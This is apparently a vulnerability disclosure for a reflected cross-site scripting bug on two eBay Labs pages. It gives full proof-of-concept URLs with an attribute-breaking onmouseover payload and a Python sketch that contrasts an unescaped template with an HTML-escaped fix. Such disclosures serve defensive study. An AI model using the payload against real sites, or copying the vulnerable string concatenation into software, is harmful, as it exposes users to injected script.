1st one- http://labs.ebay.com/erl/demoto/to?add=lp&origtitle=Mr.&qy=%27%20onmouseover%3dprompt%281337%29%20bad%3d%27&skipk=20&sq=pop&title=Mr.
2nd one- http://labs.ebay.com/publications/?wpa-paged=2&wpa-sort=%22%20onmouseover%3dprompt%281337%29%20bad%3d%22
Attack Details: The URL-encoded GET input qy was set to ' onmouseover=prompt(1337) bad='
The input is reflected inside a tag parameter between single quotes.
Affected items: /erl/demoto/to & /publications/
How to fix this vulnerability: Your script should filter metacharacters from user input.
This bug was reported to eBay and is now resolved.
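
The fix described above, as an added example that is not part of the original report and not eBay's code: a Python sketch of a template that reflects qy inside a single-quoted attribute, next to a version that neutralizes the metacharacters by HTML-encoding them on output. The input markup and all function names are assumptions, since the report does not show the server-side code; the payload is the one given in the attack details.

```python
import html
from html.parser import HTMLParser
from urllib.parse import unquote

# Payload from the attack details, URL-decoded: ' onmouseover=prompt(1337) bad='
PAYLOAD = unquote("%27%20onmouseover%3dprompt%281337%29%20bad%3d%27")

def render_vulnerable(qy: str) -> str:
    # Hypothetical template: input is copied raw into a single-quoted attribute,
    # so a leading ' closes the value and the rest becomes new attributes.
    return "<input type='text' name='qy' value='" + qy + "'>"

def render_fixed(qy: str) -> str:
    # quote=True encodes ' as &#x27; and " as &quot; (plus & < >), so the value
    # cannot end the attribute whichever quote style the template uses.
    return "<input type='text' name='qy' value='" + html.escape(qy, quote=True) + "'>"

class AttrCollector(HTMLParser):
    """Collects start-tag attributes the way an HTML parser sees them."""
    def __init__(self):
        super().__init__()
        self.attrs = {}

    def handle_starttag(self, tag, attrs):
        self.attrs.update(attrs)

def parsed_attrs(markup: str) -> dict:
    collector = AttrCollector()
    collector.feed(markup)
    collector.close()
    return collector.attrs

def has_event_handler(markup: str) -> bool:
    # Any on* attribute means the reflected input escaped its attribute value.
    return any(name.startswith("on") for name in parsed_attrs(markup))

if __name__ == "__main__":
    for render in (render_vulnerable, render_fixed):
        out = render(PAYLOAD)
        print(f"{render.__name__}: {out}")
        print(f"  event handler injected: {has_event_handler(out)}")
```
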